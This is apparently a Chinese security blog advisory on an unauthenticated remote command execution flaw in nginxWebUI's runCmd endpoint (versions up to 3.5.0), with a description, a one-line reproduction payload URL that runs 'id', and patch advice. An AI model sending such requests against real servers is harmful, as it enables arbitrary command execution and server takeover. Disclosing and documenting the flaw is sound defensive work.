声明:该网站大部分文章来自作者日常学习笔记,文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任.

nginxWebUI runCmd 远程命令执行漏洞

0x01 漏洞描述及影响

nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载.

nginxWebUI后台提供执行nginx相关命令的接口,未对用户的输入进行过滤,导致可在后台执行任意命令.并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果,甚至接管服务器.

0x02 受影响的版本

nginxWebUI <= 3.5.0

0x03 漏洞复现

640

payload:
1
http://XXXX/AdminPage/conf/runCmd?cmd=id

640 (1).png)

640 (2).png)

0x04 漏洞修复

如非必要,不要将该系统暴露在互联网上.

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://gitee.com/cym1102/nginxWebUI/releases